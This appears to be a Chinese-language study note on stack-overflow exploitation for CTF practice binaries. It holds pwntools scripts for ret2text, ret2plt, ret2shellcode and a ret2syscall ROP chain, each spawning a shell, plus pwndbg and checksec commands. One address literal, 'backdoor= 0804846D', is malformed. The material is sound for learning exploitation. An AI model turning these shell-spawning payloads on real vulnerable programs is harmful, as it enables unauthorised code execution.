原理
危险函数:gets scanf
pwndbg
Python2 安装
pip install pwntools
apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3
ni 单步
si 子函数
libc_database
例子
pwntools getshell
from pwn import *
sh = process('./level0')
# 调用system地址
callsystem = 0x400596
# p64 小端序 96 05 40 00 00 00 00 00
# 用a填满0x80长度的栈,然后把ebs替换,并附上callsystem地址
payload = 'a'*0x80 + 'b'*8 + p64(callsystem)
# 断点
# gdb.attach(sh)
sh.send(payload)
# 交互
sh.interactive()
# 查看内存数据 5个字节
# x/5bx 0x400596
# 继续执行
# cn
# 检查安全保护
checksec level0
# 查看是否开启
cat /proc/sys/kernel/randomize_va_space
保护
查看保护属性
PIE
NX
RELPRO
Partical RELRO
Full
ret2text
from pwn import *
sh = process('./ret2text')
backdoor= 0804846D
payload = 'a'*0x28 + 'b'*4 + p32(backdoor)
sh.send(payload)
sh.interactive()
level2
用到plt表
from pwn import *
sh = process('./level2')
system_plt = 0x8048320
bin_sh = 0x804a024
# 填充满堆栈buf:ebs指向的栈大小 + ebs占4个字节
payload = 'a'*0x88 + 'b'*4
# 调用返回地址 + 参数(用不到,随便写个0) + 参数
payload += p32(system_plt) + p32(0) + p32(bin_sh)
#gdb.attach(sh)
sh.send(payload)
sh.interactive()
ret2shellcode
level1
from pwn import *
sh = process('./level1')
sh.recvuntil('What\'s this:0x')
buf_addr = sh.recvuntil('?', drop=True)
buf_addr = int(buf_addr, 16)
shellcode = asm(shellcraft.sh())
# 用shellcode填充前0x88个字节,不满的填充a, ebs占4个字节,后面时调用地址
payload = shellcode.ljust(0x88, 'a') + 'b'*4 + p32(buf_addr)
sh.send(payload)
sh.interactive()
ret2syscall
ROP
控制三次返回地址
from pwn import *
elf = ELF('./ret2syscall')
sh = process('./ret2syscall')
pop_eax_ret = 0x080b8316
pop3_ret = 0x0806edd0
int_0x80 = 0x0806ca25
bin_sh = elf.search('/bin/sh\x00').next()
#execve("/bin/sh", 0, 0)
payload = 'a'*0x28 + 'b'*4
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(pop3_ret) + p32(0) + p32(0) + p32(bin_sh)
payload += p32(int_0x80)
sh.send(payload)
sh.interactive()
堆内存
相关资料
https://wiki.x10sec.org/